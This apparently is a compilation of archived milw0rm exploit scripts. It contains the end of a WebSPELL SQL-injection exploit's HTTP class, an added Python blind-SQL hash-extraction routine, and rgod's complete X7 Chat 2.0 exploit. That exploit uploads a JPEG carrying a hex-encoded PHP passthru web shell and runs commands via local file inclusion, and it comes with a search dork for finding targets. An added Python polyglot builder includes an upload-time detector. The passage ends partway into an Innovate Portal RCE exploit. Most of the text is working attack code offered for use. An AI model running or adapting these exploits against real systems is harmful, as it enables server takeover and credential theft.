		if(empty($code)) $code = $this->recv;
		$header = explode("\n",$code);
		$onlyheader = $header[0]."\n";
		for($i=1;$i<count($header);$i++)
		{
			if(!preg_match("/^(\S*):/",$header[$i])) break;
			$onlyheader .= $header[$i]."\n";
		}
		return $onlyheader;
	}

	
	/**
	 * This function is called by the cookiejar() function.
	 * It adds the value of the "Set-Cookie" header in the "Cookie"
	 * header for the next request. You don't have to call it.
	 * 
	 * @param string $server_response
	 */
	private function getcookie($code)
	{
		$carr = explode("\n",str_replace("\r\n","\n",$code));
		for($z=0;$z<count($carr);$z++)
		{
			if(preg_match("/set-cookie: (.*)/i",$carr[$z],$cookarr))
			{
				$cookie[] = preg_replace("/expires=(.*)(GMT||UTC)(\S*)$/i","",preg_replace("/path=(.*)/i","",$cookarr[1]));
			}
		}

		for($i=0;$i<count($cookie);$i++)
		{
			preg_match("/(\S*)=(\S*)(|;)/",$cookie[$i],$matches);
	    	        $cookn = $matches[1];
	    	        $cookv = $matches[2];
	    	        $this->addcookie($cookn,$cookv);
		}
    }

	
	/**
	 * This function is called by the get()/post() functions.
	 * You don't have to call it.
	 *
	 * @param string $urltarg
	 */
	private function target($urltarg)
	{
		if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/";
		$this->url=$urltarg;
		
		$array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)));
		$this->host=$array[0];

		preg_match("/:(\d+)\//",$urltarg,$matches);
		$this->port=empty($matches[1]) ? 80 : $matches[1];
		
		$temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg));
		preg_match("/\/(.*)\//",$temp,$matches);
		$this->path=str_replace("//","/","/".$matches[1]."/");
	
		if($this->port > 65535) die("Error: Invalid port number");
	}
	
	
	/**
	 * If you call this function, the script will
	 * extract all "Set-Cookie" headers values
	 * and it will automatically add them into the "Cookie" header
	 * for all next requests.
	 *
	 * $this->cookiejar(1); // enabled
	 * $this->cookiejar(0); // disabled
	 * 
	 */
	public function cookiejar($code)
	{
		if($code===0) $this->cookiejar='';
		if($code===1) $this->cookiejar=1;
		else
		{
			$this->getcookie($code);
		}
	}


	/**
	 * If you call this function, the script will
	 * follow all redirections sent by the server.
	 * 
	 * $this->allowredirection(1); // enabled
	 * $this->allowredirection(0); // disabled
	 * 
	 * @return $this->get($locationresponse)
	 */
	public function allowredirection($code)
	{
		if($code===0) $this->allowredirection='';
		if($code===1) $this->allowredirection=1;
		else
		{
			if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr))
			{
				$location = str_replace(chr(13),'',$codearr[2]);
				if(strpos($location,"://")===false)
				{
					return $this->get("http://".$this->host.$this->path.$location);
				}
				else
				{
					return $this->get($location);
				}
			}
			else
			{
				return $code;
			}
		}
	}
	
	
	/**
	 * This function allows you to reset some parameters:
	 * 
	 * $this->reset(header); // headers cleaned
	 * $this->reset(cookie); // cookies cleaned
	 * $this->reset();       // clean all parameters
	 *
	 * @param string $func
	 */
	public function reset($func='')
	{
		switch($func)
		{
			case "header":
			$this->header='';
			break;
			
			case "cookie":
			$this->cookie='';
			break;
			
			default:
		        $this->cookiejar='';
		        $this->header='';
		        $this->cookie='';
		        $this->allowredirection=''; 
		        $this->agent='';
		        break;
		}
	}
}
?>

# milw0rm.com [2007-03-03]
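Worked example, added here and not DarkFig's code: the boolean-based blind extraction that the `blind()` function above performs through the `getsquad` variable (which `register_globals=On` lets the client set, bypassing the `squadID` check in members.php), rewritten in Python with a pluggable oracle so it runs offline. Two changes from the exploit's loop: the length is found first with `LENGTH()`, because a `= NULL` comparison is never true in SQL and cannot signal the end of the string, and each byte is found by binary search on `ORD(SUBSTR())`, 8 requests per byte instead of up to 17 linear guesses. `FAKE_ROW` is constructed sample data standing in for the `${prefix}_user` row; its values are the ones shown in the exploit's sample run. `fake_oracle` parses the predicate this script itself renders and stands in for the HTTP round trip plus the `-sqlmatch` regex; against a real target it would be replaced by a function that fetches `members_url()` and reports whether the page matched.

```python
import re
from typing import Callable
from urllib.parse import urlencode

Oracle = Callable[[str], bool]  # takes the rendered WHERE clause, answers "did the page match?"

# Constructed stand-in for the row of the first user whose group has files=1.
FAKE_ROW = {"userID": "1", "password": "7b24afc8bc80e548d66c4e7ff72171c5"}


def target_expr(prefix: str, field: str) -> str:
    """The scalar subquery the exploit reads: one field of the first file admin."""
    return (f"(SELECT {field} FROM {prefix}_user WHERE userID="
            f"(SELECT userID FROM {prefix}_user_groups WHERE files=1 LIMIT 1) LIMIT 1)")


def length_predicate(prefix: str, field: str, op: str, n: int) -> str:
    return f"WHERE LENGTH({target_expr(prefix, field)}){op}{n}"


def char_predicate(prefix: str, field: str, pos: int, op: str, n: int) -> str:
    # ORD('') is 0 in MySQL, so a position past the end is never mistaken for a real byte.
    return f"WHERE ORD(SUBSTR({target_expr(prefix, field)},{pos},1)){op}{n}"


def members_url(base_url: str, where_clause: str) -> str:
    """members.php concatenates $getsquad verbatim; with register_globals=On it is ours to set."""
    query = urlencode({"site": "members", "action": "show", "getsquad": where_clause})
    return f"{base_url}index.php?{query}"


def _bisect(ask: Callable[[str, int], bool], hi: int) -> int:
    """Smallest v in [0, hi] for which ask('>', v) is false, i.e. the hidden value."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(">", mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle: Oracle, field: str, prefix: str = "webs", max_len: int = 255) -> str:
    """Recover FAKE_ROW-style field contents one byte at a time through a yes/no oracle."""
    length = _bisect(lambda op, v: oracle(length_predicate(prefix, field, op, v)), max_len)
    chars = []
    for pos in range(1, length + 1):
        code = _bisect(lambda op, v, p=pos: oracle(char_predicate(prefix, field, p, op, v)), 255)
        chars.append(chr(code))
    return "".join(chars)


_LEN_RE = re.compile(r"^WHERE LENGTH\(\(SELECT (\w+) FROM .+ LIMIT 1\)\)([<>=])(\d+)$")
_CHR_RE = re.compile(r"^WHERE ORD\(SUBSTR\(\(SELECT (\w+) FROM .+ LIMIT 1\),(\d+),1\)\)([<>=])(\d+)$")
_OPS = {">": lambda a, b: a > b, "<": lambda a, b: a < b, "=": lambda a, b: a == b}


def fake_oracle(where_clause: str) -> bool:
    """Offline stand-in for the request plus the -sqlmatch check: evaluates the predicate on FAKE_ROW."""
    m = _LEN_RE.match(where_clause)
    if m:
        field, op, n = m.group(1), m.group(2), int(m.group(3))
        return _OPS[op](len(FAKE_ROW[field]), n)
    m = _CHR_RE.match(where_clause)
    if m:
        field, pos, op, n = m.group(1), int(m.group(2)), m.group(3), int(m.group(4))
        value = FAKE_ROW[field]
        code = ord(value[pos - 1]) if pos <= len(value) else 0
        return _OPS[op](code, n)
    raise ValueError("unexpected predicate: " + where_clause)


if __name__ == "__main__":
    user_id = blind_extract(fake_oracle, "userID")
    pw_hash = blind_extract(fake_oracle, "password")
    print(f"ws_auth={user_id}%3A{pw_hash}")  # the cookie the exploit forges after extraction
    print(members_url("http://localhost/webspell/", char_predicate("webs", "password", 1, ">", 64)))
```

For a 32-character md5 hash this needs 8 length probes plus 8 probes per character, about 264 requests, and it terminates deterministically; the `ws_auth` cookie assembled from the two fields is what the exploit then presents to files.php for the upload.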


rgod/X7 Chat <= 2.0 (help_file) Remote Commands Execution Exploit ( php)

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "X7 Chat <=2.0 \"help_file\" arbitrary local inclusion\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "-> works regardless of magic_quotes_gpc settings\r\n";
echo "   if avatar uploads are enabled (default)\r\n";
echo "dork: intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\"\r\n\r\n";

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to X7\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /X7/ cat ./../config.php\r\n";
echo "php ".$argv[0]." localhost /X7/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}

/*
 software site: http://www.x7chat.com/
 description: "X7 Chat is free, open source, software written in PHP"

 vulnerable code in help/index.php at lines 32-37:

 ...
 if(!isset($_GET['help_file']) || !@is_file("./{$_GET['help_file']}")){
		$_GET['help_file'] = "main";
	}

	// Load the help definitions
	include("./{$_GET['help_file']}");
...

so, you can view/include all files on target system, poc:

http://[target]/[path]/help/index.php?help_file=../../../../../../etc/passwd

 this tool uploads an avatar whose JPEG comment (COM, 0xFFFE) segment carries PHP code,
 so the file is still a valid JPEG but include() executes the code once it is pulled in
 through the traversal. The command to run is read from a "cmd" cookie, not from the
 query string:

 GET http://[target]/[path]/help/index.php?help_file=../uploads/avatar_[username].jpeg
 Cookie: cmd=ls -la
									      */

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    if (!preg_match($proxy_regex,$proxy)) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  // every request is sent with "Connection: Close", so read until the peer closes the socket
  $html='';
  while (!feof($ock)) {
    $html.=fread($ock,8192);
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}


$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";

for ($i=3; $i<=$argc-1; $i++){
$temp=substr($argv[$i],0,2);          // option prefix, safe for one-character arguments
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=(int)substr($argv[$i],2);
}
if ($temp=="-P")
{
  $proxy=substr($argv[$i],2);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

srand(make_seed());
$v = rand(1,99);

echo "step 1 -> register...\r\n";
$data="username=suntzu".$v;
$data.="&pass1=suntzu";
$data.="&pass2=suntzu";
$data.="&email=suntzu".$v."@hotmail.com";
$packet ="POST ".$p."index.php?act=register&step=1 HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);

echo "step 2 -> login...\r\n";
$data="dologin=dologin";
$data.="&username=suntzu".$v;
$data.="&password=suntzu";
$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
// collect every Set-Cookie name=value from the login reply and replay them in one Cookie header
preg_match_all('/^Set-Cookie:\s*([^;\r\n]+)/mi',$html,$m);
$cookie=implode('; ',$m[1]);
if ($cookie=="") {die("Failed to login...\r\n");}
echo "Cookie -> ".$cookie."\r\n";
echo "step 3 -> upload an avatar...\r\n";
// JPEG layout: SOI, a COM (0xFFFE) segment holding the PHP stub, then a real 1x1 image
// (APP0/DQT/SOF0/DHT/SOS/EOI). Decoded stub: <?php if (get_magic_quotes_gpc()){$_COOKIE['cmd']=stripslashes($_COOKIE['cmd']);}
// error_reporting(0); ini_set("max_execution_time",0); echo "56789"; passthru($_COOKIE["cmd"]); echo "56789"; die; (closing tag)
$shell=
chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x00).chr(0xcf).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x69).chr(0x66).chr(0x20).
chr(0x28).chr(0x67).chr(0x65).chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).
chr(0x69).chr(0x63).chr(0x5f).chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).
chr(0x73).chr(0x5f).chr(0x67).chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).
chr(0x7b).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).
chr(0x45).chr(0x5b).chr(0x27).chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).
chr(0x3d).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c).
chr(0x61).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(0x28).chr(0x24).chr(0x5f).
chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x27).
chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d).
chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).chr(0x72).chr(0x5f).
chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).chr(0x69).chr(0x6e).
chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x69).
chr(0x6e).chr(0x69).chr(0x5f).chr(0x73).chr(0x65).chr(0x74).chr(0x28).chr(0x22).
chr(0x6d).chr(0x61).chr(0x78).chr(0x5f).chr(0x65).chr(0x78).chr(0x65).chr(0x63).
chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).chr(0x5f).chr(0x74).chr(0x69).
chr(0x6d).chr(0x65).chr(0x22).chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).chr(0x35).
chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).chr(0x3b).chr(0x0d).chr(0x0a).
chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).
chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).
chr(0x45).chr(0x5b).chr(0x22).chr(0x63).chr(0x6d).chr(0x64).chr(0x22).chr(0x5d).
chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).
chr(0x20).chr(0x22).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).
chr(0x3b).chr(0x0d).chr(0x0a).chr(0x64).chr(0x69).chr(0x65).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x09).
chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
chr(0x00).chr(0x14).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x06).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).
chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).
chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).
chr(0x3f).chr(0xc1).chr(0xc7).chr(0xdf).chr(0xff).chr(0xd9).chr(0x00).chr(0x00);

$data='-----------------------------7d63ba6e09fc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

5242880
-----------------------------7d63ba6e09fc
Content-Disposition: form-data; name="avatar"; filename="whatever.jpg"
Content-Type: image/jpeg

'.$shell.'
-----------------------------7d63ba6e09fc--
';

echo "step 4 -> launch commands...\r\n";
$packet="POST ".$p."index.php?act=usercp&cp_page=upload&uploaded=1 HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63ba6e09fc\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);

$path_to_shell=urlencode("../uploads/avatar_suntzu".$v.".jpeg");
$packet ="GET ".$p."help/index.php?help_file=".$path_to_shell." HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"56789"))
  {
    echo "Exploit succeeded...\r\n\r\n";
    $temp=explode("56789",$html);
    echo $temp[1];
    die;
  }
//if you are here...
echo "Exploit failed...";
?>

# milw0rm.com [2006-05-02]
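The avatar trick used above, a file that is at the same time a valid JPEG and a PHP script, written out in Python as an added example (mine, not rgod's tool and not X7 Chat code). The builder mirrors the byte layout of the exploit's `$shell` (SOI, a COM segment holding the PHP, then a tiny real image), `image_size()` shows that a header check in the style of getimagesize() still reports a 1x1 picture, and `find_php_tags()` is the upload-time check a defender would add. `PHP_STUB` and the minimal image tables are constructed for the example.

```python
import struct

# Constructed sample payload, the same idea as the stub the exploit hides in the avatar:
# the command arrives in the "cmd" cookie and its output is bracketed by a marker string.
PHP_STUB = b'<?php echo "56789"; passthru($_COOKIE["cmd"]); echo "56789"; die; ?>'

SOI, EOI, COM, APP0, DQT, SOF0, DHT, SOS = 0xD8, 0xD9, 0xFE, 0xE0, 0xDB, 0xC0, 0xC4, 0xDA
NAMES = {COM: "COM", APP0: "APP0", DQT: "DQT", SOF0: "SOF0", DHT: "DHT", SOS: "SOS"}


def segment(marker: int, payload: bytes) -> bytes:
    """One marker segment: FF <marker> <16-bit big-endian length incl. the 2 length bytes> <payload>."""
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_jpeg_with_comment(comment: bytes) -> bytes:
    """Minimal 1x1 grayscale baseline JPEG whose COM segment carries `comment`.

    Decoders skip COM, so the result is still a picture; PHP's include() ignores every
    byte outside <?php ... ?>, so the same file also runs as a script.
    """
    dqt = bytes([0]) + bytes([1] * 64)                        # table 0, all quantisers = 1
    sof0 = bytes([8]) + struct.pack(">HH", 1, 1) + bytes([1, 1, 0x11, 0])  # 8-bit, 1x1, 1 component
    dc = bytes([0x00]) + bytes([1] + [0] * 15) + bytes([0])   # DC table 0: code "0" -> diff category 0
    ac = bytes([0x10]) + bytes([1] + [0] * 15) + bytes([0])   # AC table 0: code "0" -> end of block
    sos = bytes([1, 1, 0x00, 0, 63, 0])                       # 1 component, DC/AC table 0, full spectrum
    scan = b"\x3f"                                            # bits 0,0 (DC diff 0, EOB) padded with 1s
    return (bytes([0xFF, SOI]) + segment(COM, comment)
            + segment(APP0, b"JFIF\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00")
            + segment(DQT, dqt) + segment(SOF0, sof0) + segment(DHT, dc) + segment(DHT, ac)
            + segment(SOS, sos) + scan + bytes([0xFF, EOI]))


def walk_segments(data: bytes):
    """Yield (marker, offset, payload) for each marker segment up to and including SOS."""
    if data[:2] != bytes([0xFF, SOI]):
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, pos, data[pos + 4:pos + 2 + length]
        if marker == SOS:                 # entropy-coded data follows, no more marker segments
            return
        pos += 2 + length


def image_size(data: bytes):
    """What a getimagesize()-style check sees: (width, height) from SOF0, or None."""
    for marker, _, payload in walk_segments(data):
        if marker == SOF0:
            height, width = struct.unpack(">HH", payload[1:5])
            return width, height
    return None


def find_php_tags(data: bytes):
    """Upload-time check: locate PHP open tags anywhere in the file, attributed to a segment.

    Returns [(where, byte_offset), ...]; an empty list means nothing was found.
    """
    hits, end = [], 0
    for marker, offset, payload in walk_segments(data):
        if b"<?" in payload:
            hits.append((NAMES.get(marker, hex(marker)), offset + 4 + payload.index(b"<?")))
        end = offset + 4 + len(payload)
    tail = data[end:]                     # scan data, EOI and anything appended after it
    if b"<?" in tail:
        hits.append(("scan-data/trailer", end + tail.index(b"<?")))
    return hits


if __name__ == "__main__":
    poly = build_jpeg_with_comment(PHP_STUB)
    print("size as seen by an image check:", image_size(poly))
    print("PHP tags found at:", find_php_tags(poly))
```

The scan looks at every byte, including the trailer after EOI, because a stub appended to a genuine photo passes the same header check. `<?` also matches `<?xml` in APP1/XMP metadata, so treat a hit as a reason to re-encode the upload (for example through an image library) rather than to reject it outright, and in any case keep uploads in a directory the interpreter is never allowed to execute or include from.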


rgod/x7chatphp.txt ( na)

Exploit for X7 Chat version 2.0 and below that makes use of an arbitrary local file inclusion flaw that allows for code execution.

Kacper/Innovate Portal <= 2.0 (acp.php) Remote Code Execution Exploit ( php)

<?php
print '
:::::::::  :::::::::: :::     ::: ::::::::::: :::        
:+:    :+: :+:        :+:     :+:     :+:     :+:        
+:+    +:+ +:+        +:+     +:+     +:+     +:+        
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
::::::::::: ::::::::::     :::     ::::    ::::  
    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
    +#+     +#+        +#+     +#+ +#+       +#+ 
    #+#     #+#        #+#     #+# #+#       #+# 
    ###     ########## ###     ### ###       ### 
	
   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
 
Innovate Portal  <= 2.0 Remote Code Execution Exploit

[Script name: Innovate Portal v2.0
[Script site: http://www.innovate-board.de/

Find by: Kacper (a.k.a Rahim)


========>  DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam  <========



Contact: kacper1964@yahoo.pl

or

http://www.rahim.webd.pl/


(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon 
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko, CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios, 
mIvus, nukedclx, SkD, wacky, 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                Greetings for 4ll Fusi0n Group mambers ;-)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';


/*
in file acp.php:
line 41-45:
....
if(isset($_REQUEST['content'])) {
	if(!file_exists('./admincp/'.$_REQUEST['content'].'.php')) {
		error('error','cant_administrate');
	}
	include('./admincp/'.$_REQUEST['content'].'.php');           // <------- {1}
....
in file content/usercp.php:
line 93-123:
....
if($_REQUEST['action'] == 'avatar') {
	if(!empty($_REQUEST['do']) && $_REQUEST['do'] == 'update') {
		if(isset($_REQUEST['use_avatar']) && $_REQUEST['use_avatar'] == 0) {
                        if(file_exists('./images/avatars/'.$user['avatar'])) {
				@unlink('./images/avatars/'.$user['avatar']);
			}
			$db->unbuffered_query("UPDATE ip".$n."_usersettings SET avatar='' WHERE setting_userid='".$user['userid']."'");
		}
		if(isset($_FILES['avatar']) && is_array($_FILES['avatar'])) {
			if(file_exists('./images/avatars/'.$user['avatar'])) {
				@unlink('./images/avatars/'.$user['avatar']);
			}
			$avatartype = get_file_extension($_FILES['avatar']['name']);
			if(move_uploaded_file($_FILES['avatar']['tmp_name'],'./images/avatars/'.$user['userid'].'.'.addslashes($avatartype))) {                 // <------- !!!{2}
				$imagesizes = getimagesize('./images/avatars/'.$user['userid'].'.'.addslashes($avatartype));
				$filesize = filesize('./images/avatars/'.$user['userid'].'.'.addslashes($avatartype));
				if($imagesizes[0] > $config['upload_avatar_width'] || $imagesizes[1] > $config['upload_avatar_height'] || $filesize > $config['upload_avatar_size']) {
					@unlink('./images/avatars/'.$user['userid'].'.'.addslashes($avatartype));
					$db->unbuffered_query("UPDATE ip".$n."_usersettings SET avatar='' WHERE setting_userid='".$user['userid']."'");
					error('error','upload_istobig');
				}
				$db->unbuffered_query("UPDATE ip".$n."_usersettings SET avatar='".$user['userid'].'.'.addslashes($avatartype)."' WHERE setting_userid='".$user['userid']."'");
			}
		$centercontent .= msgbox(get_lang('usercp','update_succ') , 'index.php?content=usercp&amp;action=avatar&amp;sid='.$sid);
		}
	}
	else {
		eval('$cvalue = "'.$tpl->get('content_usercp_avatar').'";');
		$centercontent .= newtable(get_lang('usercp','header_styles'),$cvalue);
	}
}
....
*/



if ($argc<7) {
print_r('
-----------------------------------------------------------------------------
